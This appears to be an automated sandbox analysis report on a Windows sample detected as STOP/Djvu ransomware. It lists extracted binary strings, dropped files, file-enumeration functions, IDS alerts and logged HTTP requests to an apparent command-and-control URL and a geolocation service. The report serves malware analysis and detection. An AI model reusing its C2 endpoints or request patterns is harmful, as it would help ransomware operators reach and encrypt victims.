          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\er\`Z/ source: file.exe, 00000007.00000003.2725712651.0000000003617000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696418112.0000000003656000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696841331.000000000366B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725226739.0000000003616000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725916015.0000000003626000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2659712109.0000000003176000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639487318.0000000003175000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638680963.0000000003174000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: file.exe, 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\a source: file.exe, 00000007.00000003.2381763489.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411377247.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412375336.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ ? source: file.exe, 00000007.00000003.2755774555.00000000039E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2755318794.00000000039C8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\rod.pdb source: file.exe, 00000007.00000003.2660228602.000000000313D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\w\ source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.00000000039B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744942555.00000000039C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743236831.00000000039B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\4^ source: file.exe, 00000007.00000003.2730941705.0000000003A68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.0000000003A30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2745251936.0000000003A5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744837562.0000000003A49000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\21\ source: file.exe, 00000007.00000003.2672799622.0000000003756000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2671298531.0000000003751000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\es-BO\od.pdb\ source: file.exe, 00000007.00000003.2760394418.00000000035B1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\* source: file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639575185.000000000367F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2660786899.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696418112.0000000003656000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696941483.0000000003697000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2660936222.0000000003626000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696841331.000000000366B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2672043213.000000000368B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2723421722.000000000369A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639256814.0000000003623000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638801916.0000000003622000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: file.exe, 00000007.00000003.2593877626.0000000003113000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\u source: file.exe, 00000007.00000003.2696325767.0000000003921000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.People_8wekyb3d8bbwe\LocalCache\ngs\ineer\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*W source: file.exe, 00000007.00000003.2696356257.000000000315B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2724221545.0000000003158000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbA source: file.exe, 00000007.00000003.2639109083.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\t source: file.exe, 00000007.00000003.2698806550.0000000003989000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696058379.0000000003960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698247902.0000000003961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2673162145.0000000003993000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\* source: file.exe, 00000007.00000003.2454804207.000000000313C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000313B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000312B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.0000000003145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.0000000003131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\c< source: file.exe, 00000007.00000003.2724576983.0000000003990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003999000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: file.exe, 00000007.00000003.2671364003.000000000378D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2697886616.0000000003791000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695735716.000000000374C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2670719853.000000000376D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696774171.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\E source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\#I source: file.exe, 00000007.00000003.2755908213.0000000003A6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: file.exe, 00000007.00000003.2670677971.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2672571739.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2671990261.00000000035C3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c82d26a9-b16c-48ba-9444-88303f538f65}\\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*W source: file.exe, 00000007.00000003.2670567302.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2659870179.0000000003150000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\L source: file.exe, 00000007.00000003.2454943490.0000000003106000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2698806550.0000000003989000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696058379.0000000003960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698247902.0000000003961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2673162145.0000000003993000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\hyphen-data\p.pdb\y source: file.exe, 00000007.00000003.2661790461.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2674492135.0000000003606000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\re\ source: file.exe, 00000007.00000003.2761328703.0000000003AD6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\x source: file.exe, 00000007.00000003.2755774555.00000000039E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2755318794.00000000039C8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\zg% source: file.exe, 00000007.00000003.2725712651.0000000003617000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696418112.0000000003656000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696841331.000000000366B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725226739.0000000003616000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725916015.0000000003626000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\o source: file.exe, 00000007.00000003.2639636291.000000000092F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\* source: file.exe, 00000007.00000003.2674265194.000000000092F000.00000004.00000020.00020000.00000000.sdmp

          Spreading

          barindex
          Source: C:\Users\user\Desktop\file.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:49724 -> 109.175.29.39:80
          Source: Network trafficSuricata IDS: 2036334 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key : 192.168.2.6:49719 -> 109.175.29.39:80
          Source: Network trafficSuricata IDS: 2036335 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Public Key Download : 109.175.29.39:80 -> 192.168.2.6:49719
          Source: Network trafficSuricata IDS: 2036335 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Public Key Download : 109.175.29.39:80 -> 192.168.2.6:49724
          Source: Malware configuration extractorURLs: http://cajgtus.com/test1/get.php
          Source: Joe Sandbox ViewIP Address: 109.175.29.39 109.175.29.39
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49719 -> 109.175.29.39:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49724 -> 109.175.29.39:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49711 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49722 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49713 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49721 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49723 -> 188.114.96.3:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
          Source: file.exe, 00000007.00000003.2336677168.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: file.exe, 00000007.00000003.2337270091.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: file.exe, 00000007.00000003.2337550109.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
          Source: global trafficDNS traffic detected: DNS query: cajgtus.com
          Source: file.exe, 00000007.00000003.2762877156.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2762877156.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763919794.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763919794.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php
          Source: file.exe, 0000000F.00000002.3354114917.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
          Source: file.exe, 00000007.00000002.2763764574.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
          Source: file.exe, 0000000F.00000002.3354114917.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.phpG
          Source: file.exe, 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: file.exe, 00000007.00000003.2336499216.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
          Source: file.exe, 00000007.00000003.2336759668.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
          Source: file.exe, 00000007.00000003.2336875189.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
          Source: file.exe, 00000007.00000003.2337050221.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
          Source: file.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: file.exe, 00000007.00000003.2337127273.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
          Source: file.exe, 00000007.00000003.2337270091.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
          Source: file.exe, 00000007.00000003.2337335720.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
          Source: file.exe, 00000007.00000003.2337550109.0000000003370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
          Source: file.exe, 00000002.00000003.2187001173.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2188313077.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2190408839.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2762877156.000000000089B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763919794.000000000089C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2437911480.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000003.2473936462.000000000089E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2477831755.000000000089E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000003.2513307620.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
          Source: file.exe, 0000000C.00000002.2437911480.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/Root
          Source: file.exe, 0000000C.00000002.2437911480.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000003.2431855915.00000000007C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/c
          Source: file.exe, 0000000C.00000002.2437911480.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000003.2431855915.00000000007C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/e
          Source: file.exe, 0000000D.00000002.2477831755.0000000000828000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000003.2473936462.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2477831755.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000003.2513307620.0000000000838000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000F.00000003.2513307620.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: file.exe, 0000000D.00000002.2477831755.0000000000828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonKuL5
          Source: file.exe, 00000002.00000003.2187001173.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2188313077.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2190408839.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000003.2513307620.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonX
          Source: file.exe, 0000000F.00000003.2513307620.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsoneE
          Source: file.exe, 0000000C.00000002.2437911480.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonhi
          Source: file.exe, 00000002.00000003.2187001173.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2188313077.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2190408839.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp
          Source: file.exe, 0000000D.00000002.2477831755.0000000000828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
          Source: file.exe, 0000000F.00000003.2513307620.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonsoft
          Source: 58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.7.drString found in binary or memory: https://substrate.office.com
